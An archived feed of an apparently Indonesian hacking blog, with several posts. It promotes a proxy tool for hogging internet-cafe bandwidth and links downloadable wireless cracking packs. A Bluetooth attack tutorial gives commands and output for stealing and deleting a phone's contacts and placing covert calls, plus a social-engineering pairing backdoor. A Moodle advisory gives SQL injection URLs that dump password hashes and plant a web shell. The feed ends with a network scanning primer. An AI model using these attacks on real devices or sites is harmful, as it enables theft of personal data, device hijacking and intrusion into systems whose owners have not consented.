tambahan Di Bawah Toolbar Navigasi &amp; Address Bar.</span><br /><br /><span style="font-family:arial;"><span style="font-weight: bold; font-style: italic;">Sekarang Browser Mozilla Siap Untuk Digunakan……. :: </span><br />Message ::<br />– Software <span style="font-weight: bold;">SwitchProxy Tool Versi 1.3.4</span> Ini selain untuk Mengganti Proxy Secara Otomatis Di Browser Mozilla FireFox, Engine-nya Juga Berpengaruh terhadap Kecepatan Koneksi Internet<br />– Cara Ini Sangat Efektif Bila Digunakan Di Warnet Yang Padat Pengunjung untuk Menyedot Bandwidth ( Mayoritas kecepatan akses Internet ) Ke Komputer Yang Sedang <span style="font-style: italic;">Online</span><br />– Hati-hati Perubahan Yang Signifikan Terjadi Pada koneksi Internet Dengan BROADBAND</span><div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8559681578113508762-4438517390854047987?l=yudhax2.blogspot.com' alt='' /></div>yudhadewahttp://www.blogger.com/profile/08277124415735596166noreply@blogger.com0tag:blogger.com,1999:blog-8559681578113508762.post-45257825736313352442008-03-22T07:07:00.003+07:002008-05-13T05:16:17.234+07:00<span style="font-family:arial;"></span><br /><span style="font-family:arial;"><span style="font-weight: bold;">Level 1</span>:</span><br /><span style="font-family:arial;">aerosol.zip Aerosol (0.65)</span><br /><span style="font-family:arial;">abappwd.zip ABAP PW Crack</span><br /><span style="font-family:arial;">aircrack.zip Aircrack (2.4)</span><br /><span style="font-family:arial;">aircrackng.zip Aircrack-NG (0.6.2)</span><br /><span style="font-family:arial;">aircrackpack.zip Aircrack Pack</span><br /><span style="font-family:arial;">aire.zip Aire (1.0)</span><br /><span style="font-family:arial;">airsnort.zip Airsnort</span><br /><span style="font-family:arial;">asleap.zip Cisco Leap (1.0)</span><br /><span style="font-family:arial;">aptools.zip AP Tools (0.1.0)</span><br /><span style="font-family:arial;">cowpatty.zip Cowpatty</span><br /><span style="font-family:arial;">netstumbler.zip Netstumbler AP Detection (0.4.0)</span><br /><span style="font-family:arial;">weplab.zip WepLab (0.1.5)</span><br /><span style="font-family:arial;">Donwload:</span><br /><a href="http://rapidshare.com/files/25265188/Feliks_wireless_pack.zip"><span style="font-family:arial;">http://rapidshare.com/files/25265188/Feliks_wireless_pack.zip</span></a><br /><br /><span style="font-family:arial;">Level 2:[update]</span><br /><span style="font-family:arial;">EasyWifiRadar</span><br /><span style="font-family:arial;">HotSpotter-0.4</span><br /><span style="font-family:arial;">Kismet 2005-08-R1</span><br /><span style="font-family:arial;">Wellenreiter-v1.9</span><br /><span style="font-family:arial;">wepwedgie-alpha-0.1</span><br /><span style="font-family:arial;">Download:</span><br /><a href="http://rapidshare.com/files/26345803/Feliks_wireless_pack_2.zip"><span style="font-family:arial;">http://rapidshare.com/files/26345803/Feliks_wireless_pack_2.zip</span></a><br /><br /><span style="font-family:arial;">Tambahan:</span><br /><span style="font-family:arial;">+ the WireShark download:</span><br /><a href="http://wireshark.newworldorder.com.es/win32//wireshark-setup-0.99.5.exe"><span style="font-family:arial;">http://wireshark.newworldorder.com.es/win32//wireshark-setup-0.99.5.exe</span></a><br /><br /><span style="font-family:arial;">+The wireshark official site:</span><br /><a href="http://www.wireshark.org/download.html"><span style="font-family:arial;">http://www.wireshark.org/download.html</span></a><br /><br /><span style="font-family:arial;">AttachMent Best:</span><br /><a href="http://rapidshare.com/files/36519722/AIO_Wireless_Hack_Toolz.rar"><span style="font-family:arial;">http://rapidshare.com/files/36519722/AIO_Wireless_Hack_Toolz.rar</span></a><div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8559681578113508762-4525782573631335244?l=yudhax2.blogspot.com' alt='' /></div>yudhadewahttp://www.blogger.com/profile/08277124415735596166noreply@blogger.com0tag:blogger.com,1999:blog-8559681578113508762.post-79025162235022316792008-03-15T18:27:00.005+07:002008-05-13T05:16:47.725+07:00<div style="text-align: justify;"><span style="font-size:100%;">Art From: echo|zine, volume 4 issue 15<br /></span></div><pre><span style="font-size:100%;"><br />[ 101 A Bluetooth [in]Security ]<br />[ y3dips <http> ]<br /><br /><br />---// Pengantar<br /><br />Bluetooth adalah salah satu teknologi pengganti kabel yang mengkonsumsi<br />sedikit tenaga listrik, memiliki harga yang relatif murah, berjarak relatif<br />pendek (10-100m), dan dapat digunakan untuk pertukaran data dan suara.<br /><br />Riset tentang teknologi "bluetooth" yang telah dilakukan oleh ericsson(tm)<br />pada tahun 1998 telah memberikan dampak yang cukup besar pada teknologi<br />"pengganti kabel" atau yang lebih sering aku kenal dengan "wireless technology".<br />Riset ini Kemudian dilanjutkan oleh sebuah grup yang menamakan dirinya<br />Special Interest Group dengan "codename" bluetooth dan telah di dukung oleh<br />banyak perusahaan besar yang berkepentingan dengan teknologi ini. Sehingga<br />pada tahun 1999 dikeluarkanlah versi pertama (bluetooth ver 1.0) dan versi<br />yang sekarang digunakan adalah versi 2.0 (merupakan ver 1.2 ditambah EDR).<br /><br />Teknologi bluetooth sampai saat ini tetap dipakai dan di kembangkan pada<br />kurang lebih 856 produk[3].<br /><br />---// Why attacking bluetooth ?<br /><br />1. Bluetooth dipakai pada peralatan pribadi yang umumnya menyimpan<br />informasi penting yang bersifat pribadi juga dan menjadikannya<br />sebagai target yang berharga bagi penyerang<br /><br />2. Untuk menyerang device bluetooh penyerang tidak perlu untuk melewati<br />Lapisan firewall, policy, third party security application, IDS/IPS.<br /><br />3. Bisa ditemukan dibanyak tempat di karenakan layanan ini di pakai<br />dibanyak "device".<br /><br />---// Technical Details<br /><br />- Menggunakan frekuensi 2,4GHz<br />- 79 channel, dengan lompatan frekuensi 1600 hops/second<br />- Menggunakan "single chip radio" sehingga harganya relatif murah<br />- Memiliki "range" 10-100 Meter<br />- Menggunakan 2.5 mW<br />- Memiliki Data Rate 1Mbps<br /><br />---// Bluetooth Mode<br /><br />-------[ 1. Service mode<br /><br />a. mode menyala ("on" mode )<br />Untuk mode "on" terdapat mode "discoverable" dan "un-discoverable",<br />dimana pada saat discoverable "device" akan dapat dan untuk di temukan<br />oleh "device" lain. Sedangkan un-discoverable mode mengakibatkan<br />secara umum tidak dapat di temukan oleh "device" lain.<br /><br />b. mode tidak menyala ( "off" mode )<br />Layanan bluetooth mati pada mode ini<br /><br />c. mode otomatis ( "automatic" mode )<br />Layanan ini akan memudahkan aplikasi untuk menggunakan layanan bluetooth<br /><br />-------[ 2. Security mode<br /><br />a. Security mode level 1<br />Tidak ada mode sekuriti sama sekali<br /><br />b. Security mode level 2<br />Sekuriti terdapat pada level "service", tetapi pada level "device"<br />tidak ada terdapat.<br /><br />c. Security mode level 3<br /><br />Sekuriti terdapat pada level "device" dan menerapkan sekuriti pada<br />setiap level yang lebih rendah.<br /><br />---// Bluetooth Security threat<br /><br />-------[ 1. Bluejacking<br /><br />Teknik ini dilakukan dengan cara mengirimkan pesan/gambar/nomer<br />telpon tanpa ijin kepada target, tujuannya adalah mulai dari perbuatan<br />iseng sampai pada "social engineering" untuk memancing target melakukan<br />pairing kepada "device" penyerang.<br /><br />-------[ 2. Bluesnarfing<br /><br />Teknik ini mengijinkan penyerang untuk terhubung ke "device" milik<br />target tanpa diketahui pemiliknya dan akan mengakibatkan penyerang<br />dapat mengakses data data penting yang tersimpan didalam "device" target<br />seperti daftar nomer telepon (buku telepon), "business card", "images"<br />bahkan IMEI (International Mobile Equipment Identity ) yang dapat<br />mengakibatkan nomer tersebut untuk di "clonning".<br /><br />-------[ 3. BlueBugging<br /><br />Teknik ini mengakibatkan "device" target dan penyerang terhubung secara<br />serial dan mengakibatkan penyerang memiliki kendali penuh terhadap<br />"device" target sehingga penyerang juga dapat mengeksekusi set perintah AT<br />(ASCII Terminal) diantaranya untuk melakukan panggilan, mengirim dan<br />membaca SMS, melakukan koneksi jaringan bahkan internet melalui "device"<br />target sampai kepada "identity theft".<br /><br />-------[ 4. BlueSmack<br /><br />Teknik ini melakukan serangan Denial Of Service terhadap device target, salah<br />satu caranya adalah memanfaatkan perintah l2ping pada protokol L2CAP.<br /><br />-------[ 5. Backdoor Attack<br /><br />Teknik ini adalah dengan memanfaatkan "pairing" yang telah tercipta antara<br />"device" target dan penyerang. Memanfaatkan Kelengahan Target dan Teknik<br />social engineering.<br /><br /><br />---// Basic Penetration<br /><br />Berikut akan aku lakukan penetrasi mendasar terhadap bluetooth sekuriti,<br />dengan harapan akan memberikan pemahaman mendalam tentang ini.<br /><br />-------[ 0. Info<br /><br />Target : Mobile phone Sony ericsson t68i<br />Penyerang : Toshiba tecra 8100<br /> Linux Ubuntu 5.10 Operating system<br /> USB bluetooth dongle with Bluez<br /><br />Tools : Bluesnarfer<br /> Bluez-utils<br /> RedFang<br /><br />-------[ 1. Preparation<br /><br />Sekarang lakukan checking terhadap bluetooth device (USB dongle) menggunakan<br />hciconfig (packet Bluez)<br /><br />//--- command ----//<br /><br />y3dips@hogwartz:~$ hciconfig -a hci0<br />hci0: Type: USB<br /> BD Address: 00:09:DD:10:4E:B1 ACL MTU: 192:8 SCO MTU: 64:8<br /> UP RUNNING PSCAN ISCAN<br /> RX bytes:394 acl:0 sco:0 events:18 errors:0<br /> TX bytes:319 acl:0 sco:0 commands:17 errors:0<br /> Features: 0xff 0xff 0x0f 0x00 0x00 0x00 0x00 0x00<br /> Packet type: DM1 DM3 DM5 DH1 DH3 DH5 HV1 HV2 HV3<br /> Link policy: RSWITCH HOLD SNIFF PARK<br /> Link mode: SLAVE ACCEPT<br /> Name: 'hogwartz-0'<br /> Class: 0x3e0100<br /> Service Classes: Networking, Rendering, Capturing<br /> "device" Class: Computer, Uncategorized<br /> HCI Ver: 1.1 (0x1) HCI Rev: 0x460 LMP Ver: 1.1 (0x1) LMP Subver: 0x460<br /> Manufacturer: Cambridge Silicon Radio (10)<br /><br />//--- command ----//<br /><br />didapatkan beberapa informasi penting, diantaranya:<br />1. Type: USB<br />2. BD Address: 00:09:DD:10:4E:B1<br />3. Service Classes: Networking, Rendering, Capturing<br /><br />Baiklah, ternyata "device" berjalan baik dan dikenali oleh system.<br /><br />-------[ 2. Scanning<br /><br />Setelah semua persiapan berjalan dengan baik maka selanjutnya adalah menemukan<br />target, untuk mendeteksi layanan bluetooth yang aktif (mode menyala) dan<br />juga "discoverable", aku hanya menggunakan hcitool (paket Bluez)<br /><br />//--- command ----//<br /><br />y3dips@hogwartz:~$ hcitool scan<br />Scanning ...<br /> 00:0A:D9:49:B6:8B T68i<br />00:0C:55:FF:F3:B6 heaven-0<br />00:D5:F9:33:B6:A4 dodlesvck<br />00:60:57:44:56:B3 6310i<br /><br />//--- command ----//<br /><br />Yupe, aku menemukan ada 4 buah "device"yang mengaktifkan layanan bluetoothnya.<br />dan aku putuskan untuk bereksplorasi satu persatu, untuk itu aku putuskan<br />akan melakukan penetrasi sesuai urutan :)<br /><br />Selanjutnya adalah melakukan perkenalan lebih jauh dengan "device" tersebut,<br />dan untuk ini digunakanlah sdptool (paket bluez) untuk melakukan browsing<br />dan secara spesifik aku tambahkan options "grep" khusus untuk menemukan<br />service apa saja yang di layani oleh "device" tersebut, "device" akan di kenali<br />dengan alamat bluetooth.<br /><br />dalam hal ini untuk "device" pertama adalah 00:0A:D9:49:B6:8B<br /><br />//--- command ----//<br /><br />y3dips@hogwartz:~$ sdptool browse 00:0A:D9:49:B6:8B | grep Service\ Name<br />Service Name: Dial-up Networking<br />Service Name: Fax<br />Service Name: Voice gateway<br />Service Name: Serial Port 1<br />Service Name: Serial Port 2<br />Service Name: OBEX Object Push<br />Service Name: IrMC Synchronization<br />Service Name: Voice gateway<br /><br />//--- command ----//<br /><br />Dan kita dapatkan bahwa device tersebut memberikan service Dial-up Networking,<br />Fax, Voice Gateway, Serial Port, OBEX, IrMC.<br /><br />Untuk melakukan cek hubungan dengan device maka kita dapat melakukan ping.<br /><br />//--- command ----//<br /><br />y3dips@hogwartz:~$ sudo l2ping 00:0A:D9:49:B6:8B<br />Ping: 00:0A:D9:49:B6:8B from 00:09:DD:10:4E:B1 (data size 44) ...<br />0 bytes from 00:0A:D9:49:B6:8B id 0 time 46.69ms<br />0 bytes from 00:0A:D9:49:B6:8B id 1 time 31.24ms<br />0 bytes from 00:0A:D9:49:B6:8B id 2 time 37.95ms<br />0 bytes from 00:0A:D9:49:B6:8B id 3 time 33.01ms<br />0 bytes from 00:0A:D9:49:B6:8B id 4 time 48.04ms<br />5 sent, 5 received, 0% loss<br /><br />//--- command ----//<br /><br />-------[ 3. Owning<br /><br />Setelah melakukan Scanning dan mendapatkan alamat target dan informasi<br />mengenai service yang dilayani oleh device tersebut maka selanjutnya kita<br />akan melakukan "snarfing" terhadap bluetooth device (Bluesnarfing).<br /><br />Salah satu erangan yang mungkin adalah membaca buku telepon dari device<br />dengan menggunakan bluesnarfer.<br /><br />//--- command ----//<br /><br />y3dips@hogwartz:~/bt/snarf$ sudo ./bluesnarfer -b 00:0A:D9:49:B6:8B -r 1-10<br />"device" name: T68i<br />+ 1 - My Sephia /M : 08883535266<br />+ 3 - Mbah Marijan/W : 021454545<br />+ 5 - Osama Laden/W : 662224258<br />+ 7 - Warung Pecel Bu Roso/W : 0214545889<br />+ 9 - Superman/W : 911<br />bluesnarfer: release rfcomm ok<br /><br />//--- command ----//<br /><br />Selanjutnya kita juga dapat menghapus buku telepon<br /><br />//--- command ----//<br /><br />y3dips@hogwartz:~/bt/snarf$ sudo ./bluesnarfer -b 00:0A:D9:49:B6:8B -w 1-10<br />"device" name: T68i<br />delete of entry 1 successfull<br />delete of entry 2 successfull<br />delete of entry 3 successfull<br />delete of entry 4 successfull<br />delete of entry 5 successfull<br />delete of entry 6 successfull<br />delete of entry 7 successfull<br />delete of entry 8 successfull<br />delete of entry 9 successfull<br />delete of entry 10 successfull<br />bluesnarfer: release rfcomm ok<br /><br />memeriksa apakah sudah terhapus<br /><br />y3dips@hogwartz:~/bt/snarf$ sudo ./bluesnarfer -b 00:0A:D9:49:B6:8B -r 1-10<br />"device" name: T68i<br />bluesnarfer: release rfcomm ok<br /><br />//--- command ----//<br /><br />Selain itu aku akan mencoba melakukan Bluebugging dengan cara mengeksekusi<br />perintah AT, dalam hal ini ATD (melakukan panggilan)<br /><br />//--- command ----//<br /><br />y3dips@hogwartz:~/bt/snarf$ sudo ./bluesnarfer -b 00:0A:D9:49:B6:8B -c 'ATD555;'<br />"device" name: T68i<br />custum cmd selected, raw output<br />OK<br />bluesnarfer: release rfcomm ok<br />y3dips@hogwartz:~/Desktop/bluetooth/pentest/snarf$<br /><br />//--- command ----//<br /><br />Tapi ingat, dengan melakukan panggilan ini maka akan tampak pada layar target<br />bahwa sednag melakukan panggilan terhadap nomer tertentu. (Sehingga sebaiknya<br />dalam melakukan panggilan pada saat target tidak berinteraksi langsung dengan<br />device)<br /><br />---// 31337 penetration<br /><br />-------[ 1. Backdooring<br /><br />Teknik Backdooring ini bisa dilakukan dengan cara berinteraksi secara langsung<br />ataupun tidak, teknik ini bertujuan membuat "device" target melakukan "pairing"<br />dengan device penyerang.<br /><br />Social enggineering berperanan penting pada teknik ini.<br /><br />Example<br /><br />a. Berinteraksi langsung<br /><br />Seperti teknik social engineering yang pada umumnya dilakukan adalah<br />dengan cara berinteraksi secara langsung dengan device target.<br /><br />real life example:<br /><br />Ingat, perubahan kartu SIM, menghidupkan dan mematikan Device tidak<br />menghapus pairing yang telah terbuat, celah ini membuat aku berpura-pura<br />kehabisan batere handphone dan meminjam handphone target untuk mengirim<br />sms, agar target semakin yakin maka aku gunakan nomer yang aku miliki<br />(agar lebih meyakinkan lagi maka sebiknya handphone kamu emang tidak<br />bisa menyala), setelah itu cobalah lakukan pairing kedevice kamu, sebelum<br />itu ada 2 hal yang harus aku lakukan<br /><br />1. menentukan PIN untuk diisikan dari handphone target<br /><br />//--- command ----//<br />root@hogwartz:~# echo "4321" > /etc/bluetooth/pin<br />//--- command ----//<br /><br /><br />2. Dan kamu perlu membaca syslog untuk mengetahui alamat target<br />yang terhubung.<br /><br />//--- command ----//<br />root@hogwartz:~# tail -f /var/log/syslog | grep hcid<br />Aug 21 20:25:30 localhost hcid[8880]: pin_code_request \<br />(sba=00:09:DD:10:4E:B1, dba=00:0A:D9:49:B6:8B)<br />//--- command ----//<br /><br />ya, dan sekarang aku tinggal matikan handphone dan tukar kartu SIM kembali,<br />selanjutnya tinggal bereksplorasi di "device" target.<br /><br />b. Berinteraksi Tidak langsung<br /><br />Cara kedua ini dikombinasikan dengan teknik BlueJacking, pada cara ini<br />aku hanya perlu mengirimkan gambar/text/lagu/ atau apapun ke device<br />target sehingga target akan melakukan cek terhadap info device pengirim<br />yang tampil pada "device" target dan jika target berniat menerima<br />gambar/text/lagu/ tersebut maka dia harus melakukan pairing dan perlu<br />memasukan sebaris PIN.<br /><br />(nama device; yang bisa di definisikan pada deviceku), Karena karakter<br />di beberapa "device", jumlah karakter tidak dibatasi maka memungkinkan<br />kita untuk menuliskan sebaris kalimat yang "membujuk" (inti social<br />engineering) seperti "FOTO NADINE NIH?" atau "UNTUK MENERIMA KETIKKAN<br />4321"<br /><br />Selanjutnya tinggal tunggu hasil pairing kita :).<br /><br /><br />-------[ 2. Detecting the undetected<br /><br />Baiklah, sekarang bagaimana kalau "device" tersebut tidak di set discoverable<br />sehingga aku akan kesulitan mendapatkan alamat device, dan aku pun tidak mungkin<br />meminjam handphone ("device") target karena satu dan lain hal (pelit mungkin:P).<br /><br />Beruntunglah aku dikarenakan ada satu tools yang dipublikasikan dengan nama<br />"redfang" dan mampu mendeteksi "device" bluetooth yang menyalakan layanannya<br />tetapi tidak di set discoverable.<br /><br />//--- command ----//<br /><br />y3dips@hogwartz:~/bt/fang$ sudo ./redfang -r 000AD949B689-000AD949B68D<br />redfang - the bluetooth hunter ver 2.5<br />(c)2003 @stake Inc<br />author: Ollie Whitehouse <ollie@atstake.com><br />enhanced: threads by Simon Halsall <s.halsall@eris.qinetiq.com><br />enhanced: "device" info discovery by Stephen Kapp <skapp@atstake.com><br />Scanning 5 address(es)<br />Address range 00:0a:d9:49:b6:89 -> 00:0a:d9:49:b6:8d<br />Found: T68i [00:0a:d9:49:b6:8b]<br />Getting "device" Information.. Failed.<br /><br />//--- command ----//<br /><br />Dan akupun mendapatkan alamat target. :), salah satu kelemahannya adalah<br />kecepatannya dalam menemukan adalah sangat lambat, aku sering menggunakan<br />options "-t" untuk meningkatkan waktu timeout dan mempercepat scanning.<br />atau bisa melakukan "recursive execute". (automated ? -- in proggress)<br /><br /><br />---// Mitos dalam "bluetooth [in]security"<br /><br />[1] Matikan saja layanan Bluetoothnya niscaya akan aman<br /><br />Mematikan layanan bluetooth ("off" mode) pada "device" tidaklah 100%<br />akan membuat "device" aman. Serangan yang mungkin dilakukan adalah<br />Social engginering dan Malicious program (virus, worm &amp; trojan)<br />yang dapat secara otomatis menyalakan layanan bluetooh ("on" mode)<br />atau bahkan melakukan pairing/backdoor attack ke bluetooth "device".<br /><br />Jadi perkuat device anda dengan firewall dan juga antivirus<br /><br />[2] Di Buat "[un]discoverable" akan aman<br /><br />Lihat sub-chapter "31337 penetration" pada bagian kedua "Detecting<br />the undetected"<br /><br />[3] Tidak ada informasi penting di bluetooth "device"<br /><br />Salah, ambil contoh "mobile "device" (phone, smart phone, laptop)"<br />Hampir seluruh data penting tersimpan, misalkan mobile phone, disana<br />terdapat seluruh nomer nomer yang penting bagi anda meskipun anda<br />tidak termasuk orang penting :P.<br /><br />[4] Jaraknya pendek<br /><br />Jarak bluetooth device umumnya pendek 10-100 Meter, tetapi dengan<br />adanya teknik untuk memperkuat signal[6] maka jangkauan pun bisa<br />di perjauh bahkan sampai 1 km.<br /><br />[5] Penyerangnya pasti akan tampak "aneh" dan "mencurigakan" [karena membawa<br />-bawa laptop dan bluetooth device yang di modifikasi (perkuat sinyal)?]<br /><br />Tidak juga, bahkan sekarang via mobile phone/PDA (java supported)<br />bisa melakukan "assessment"[2].<br /><br />---// Bertahan ?<br /><br />[1] Update informasi anda tentang "device" anda (khususnya soal security)<br />[2] Update Frimware anda, jikalau termasuk "device" yang di curigai<br />[3] Periksa daftar "trusted Pair", hapus yang sudah tidak dibutuhkan, hindari<br />backdoor attack<br />[4] Gunakan Fitur keamanan tambahan (eg: Antivirus, Firewall)<br />[5] Untuk meminimalisir serangan matikan layanan bluetooth anda jika tidak<br />digunakan<br />[6] Jikapun dibutuhkan, buatlah PIN yang relatif kuat.<br />[7] Pastikan untuk tidak sembarangan melakukan koneksi/pairing (eg: terima<br />file dari "unknown device")<br /><br /><br />---// Clue<br /><br />Sebagian handphone memiliki celah terserang teknik bluesnarfing ataupun<br />bluebug saat visible (discoverable) dan sebagian lainnya non-visible<br /> (non-discoverable), sementara beberapa jenis lainnya tidak vulnerable<br /> kecuali dengan menggunakan backdoor attack dan teknik bluejacking<br />(Social engineering)<br /><br />---// Kamus<br /><br />Pairing adalah suatu bagian (state) yang dilakukan apabila dua buah<br />"device" setuju untuk berkomunikasi satu sama lainnya, setelah state<br />ini terjadi maka apabila ingin terjadi komunikasi ulang maka akan<br />membypass proses pencarian (discovery) dan otentikasi (authentication)<br />yang biasa terjadi pada saat interaksi.<br /><br />---// Referensi ( echo.or.id - Ammar )<br /><br />[1] y3dips, "Owned a mobile "device" via bluetooth", dipresentasikan dan<br /> didemokan pada "Cryptography and Wireless security seminar", 2006<br />[2] Trifinite official site`s. http://trifinite.org<br />[3] SIG. http://bluetooth.org<br />[4] http://thebunker.net<br />[5] wikipedia. http://en.wikipedia.org<br />[6] bluesniper. http://www.tomsnetworking.com/2005/03/08/how_to_bluesniper_pt1/<br /><br />---// Greetz </skapp@atstake.com></s.halsall@eris.qinetiq.com></ollie@atstake.com></http></span></pre><div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8559681578113508762-7902516223502231679?l=yudhax2.blogspot.com' alt='' /></div>yudhadewahttp://www.blogger.com/profile/08277124415735596166noreply@blogger.com1tag:blogger.com,1999:blog-8559681578113508762.post-61593824980148441832008-03-15T11:50:00.001+07:002008-05-13T05:17:34.060+07:00-- Security Internet<br /><br />Manual Testing Notes<br />to view user/admin password hashes:<br /><br />http://[target]/[path]/iplookup/ipatlas/plot.php?address=127. 0.0.1&amp;user='or%20isnull(1/0)/* to inject a shell:<br /><br />http://[target]/[path]/iplookup/ipatlas/plot.php?address=127.0 .0.1&amp;user='UNION %20SELECT%200,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, 0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, '%20',0,0,0,0,0,0,0,0%20INTO%20DUMPFILE%20'../ ../w ww/moodle/shell.php'%20FROM%20mdl_user/*<br /><br />Solution Description<br />Upgrade to version 1.6dev or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.<br /><br />Vulnerability classification:<br />- Remote vulnerability<br />- Input manipulation attack<br />- Impact on integrity<br />- Exploit available<br />- Verified<br /><br />Second checking :<br /><span class="Apple-style-span" style="border-collapse: separate; color: rgb(0, 0, 0); font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: 2; text-indent: 0px; text-transform: none; white-space: pre; widows: 2; word-spacing: 0px;font-family:'Lucida Grande';font-size:12;" ><a href="http://www.milw0rm.com/exploits/1312"><span style="font-size:100%;"><span style="font-family:georgia;">http://www.milw0rm.com/exploits/1312</span></span></a><br /><br /></span><br />OK,<br />Thank you<div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8559681578113508762-6159382498014844183?l=yudhax2.blogspot.com' alt='' /></div>yudhadewahttp://www.blogger.com/profile/08277124415735596166noreply@blogger.com0tag:blogger.com,1999:blog-8559681578113508762.post-572380437961266992008-03-15T11:49:00.001+07:002008-05-13T05:18:14.663+07:00Scanning helps one to know what services are running on a machine. This will show the open ports on which services are listening for connections. First we will determine whether the target machine is alive or not. This can be done by sending a icmp echo request packet to the server. The server would respond with a icmp echo reply showing that it’s alive. The process to do this on a range of hosts or ipaddresses is known as ping sweep. Of the many methods used, we will look on ICMP ping and echo port ping.<br /><br /><span style="font-weight: bold;">ICMP ping</span><br /><br />Your machine will send an icmp echo request (type 8) to the target machine and it would respond with an icmp echo reply(type 0) if it is alive. You can use the Unix ping command to do this:<br /><br />[root@ns2 root]# ping -c 3 66.218.71.86<br />PING 66.218.71.86 (66.218.71.86) from 203.41.193.140 : 56(84) bytes of data.<br />64 bytes from 66.218.71.86: icmp_seq=1 ttl=51 time=207 ms<br />From 203.41.193.137: icmp_seq=2 Redirect Host (New nexthop: 202.5.165.81)<br />64 bytes from 66.218.71.86: icmp_seq=2 ttl=51 time=204 ms<br />64 bytes from 66.218.71.86: icmp_seq=3 ttl=51 time=203 ms<br /><br />--- 66.218.71.86 ping statistics ---<br />3 packets transmitted, 3 received, 0% loss, time 2019ms<br />rtt min/avg/max/mdev = 203.938/205.171/207.287/1.503 ms<br />[root@ns2 root]#<br /><br />At the end it will give you a summary, showing statistics of number of packets received and sent and the %age of packet loss.<br /><br />Echo port ping<br /><br />This makes use the echo service running on the target machine which runs on port 7. Whatever you send it, will be echoed back to you. So if you see that it echoed back what you sent, then you can be sure that the target machine is alive.<br /><br />Two interesting tools on Linux is Fping and Nmap<br /><br /><span style="font-weight: bold;">Fping</span><br /><br />Fping sends multiple icmp request packets simultaneously and processes the reply as they occur. This makes ping sweeps faster. Fping can be feeded with an ipaddress or can be given a list of ipaddress on a file.<br /><br />[root@Krishna]# fping -a -g 203.122.1.0 203.122.1.80<br />203.122.1.9<br />203.122.1.26<br />203.122.1.37<br />203.122.1.47<br />203.122.1.54<br />203.122.1.42<br />203.122.1.68<br />203.122.1.80<br />[root@Krishna]#<br /><br />Type fping -h for a full listing of available options.<br /><br /><span style="font-weight: bold;">Nmap</span><br /><br />Nmap is a powerful tool that can do a lot more than ping sweep.<br />To use nmap for ping sweeping use the –sP argument.<br />[root@ns2 root]# nmap -sP 203.122.58.0/24<br /><br />Starting nmap V. 3.00 ( www.insecure.org/nmap/ )<br />Host (203.122.58.1) appears to be up.<br />Host (203.122.58.2) appears to be up.<br />Host (203.122.58.5) appears to be up.<br />Host (203.122.58.6) appears to be up.<br />Host (203.122.58.9) appears to be up.<br />Host (203.122.58.10) appears to be up.<br />Host (203.122.58.13) appears to be up.<br />Host (203.122.58.14) appears to be up.<br />caught SIGINT signal, cleaning up<br />[root@ns2 root]#<br /><br />If ICMP is blocked on the firewall of the target machine, additional techniques can be used to determine whether systems are alive.<br />Nmap provides a advanced option called TCP ping scan. It is initiated with the argument –PT with a port number such as port 80, since packets to this port is allowed by many firewall and border routers to the systems on their demilitarized zone (DMZ).<br /><br />[root@ns2 root]# nmap -sP -PT80 203.122.58.0/24<br /><br />Starting nmap V. 3.00 ( www.insecure.org/nmap/ )<br />Host (203.122.58.1) appears to be up.<br />Host (203.122.58.2) appears to be up.<br />Host (203.122.58.5) appears to be up.<br />Host (203.122.58.6) appears to be up.<br />Host (203.122.58.9) appears to be up.<br />Host (203.122.58.10) appears to be up.<br />Host (203.122.58.13) appears to be up.<br />Host (203.122.58.14) appears to be up.<br />caught SIGINT signal, cleaning up<br />[root@ns2 root]#<br /><br /><span style="font-weight: bold;">Icmpenum</span><br /><br />This tool from Simple Nomad (http://www.nmrc.org/project/misc/icmpenum-1.1.1.tgz) .<br />Even if the border router or firewall blocks ICMP echo packets , the systems status of being alive can be determined by looking for a different ICMP type, like icmp time stamp request and icmp info requests.<br />[krishna]# icmpenum –i2 –c 192.168.1.0<br /><br />In the above example, we enumerated the entire 192.168.1.0 class C network using an icmp time stamp request . Icmpenum can send spoofed packets to avoid detection. Use the s argument to send spoofed packets and passively listen for responses with the p switch.<br /><span style="font-weight: bold;"><br />Icmpquery</span><br /><br />Icmpquery can be found at http://packetstormsecurity.com/UNIX/scanners/icmpquery.c<br />Ping sweeps makes use of icmp echo packets , but there are a lot more types of icmp packets which can be used to gather valuable information about the system. For example you can request the time ona system by sending an ICMP type 13 message (TIMESTAMP) and you can request the netmask of a particular device with the ICMP type 17 message (ADDRESS MASK REQUEST).<br />To query a routers time, you can run the command:<br />[root@ns2 files]# ./icmpquery -t 213.206.75.252<br />213.206.75.252 : Sun Jun 8 16:46:30 2003<br />[root@ns2 files]#<br /><br />and to query a routers netmask, use<br /><br />[Krishna]# icmpquery –m 213.206.75.252<br /><span style="font-weight: bold;"><br />Windows tools:</span><br /><br />To do ping sweeps in windows, try the freeware pinger from Rhino9 (http://nmrc.org/snt). Some other tools for windows are Ping Sweep from Solarwinds (http://www.solarwinds.net)<br />WS_Ping ProPack (http://www.ipswitch.com) NetScan Tools (http://www.nwpsw.com)<br /><span style="font-weight: bold;"><br />Port Scanning:</span><br /><br />Port scanning is the process of connecting to TCP and UDP ports on the target system to determine what services are running or in a listening state. Identifying listening ports is essential to determine the type of operating system and application in use on the system.<br /><br /><span style="font-weight: bold;">Types of port scanning:</span><br /><br />1.) TCP connect scan: This type of scan connects to the target port and completes a full three way handshake (SYN, SYN/ACK and ACK).<br />2.) TCP SYN scan: This is also called half-open scanning because it does not complete the three-way handshake, rather a SYN packet is sent and upon receiving a SYN/ACK packet it is determined that the target machines port is in a listening state and if an RST/ACK packet is received , it indicates that the port is not listening.<br />3.) TCP FIN scan: This technique sends a FIN packet to the target port and based on RFC 793 the target system should send back an RST for all closed ports.<br />4.) TCP Xmas Tree scan: This technique sends a FIN,URG and PUSH packet to the target port and based on RFC 793 the target system should send back an RST for all closed ports.<br />5.) TCP Null scan: This technique turns off all flags and based on RFC 793 , the target system should send back an RST for all closed ports.<br />6.) TCP ACK scan: This technique is used to map out firewall rulesets. It can help determine if the firewall is a simple packet filter allowing only established connections or a stateful firewall performing advance packet filtering.<br />7.) TCP Windows scan: This type of scan can 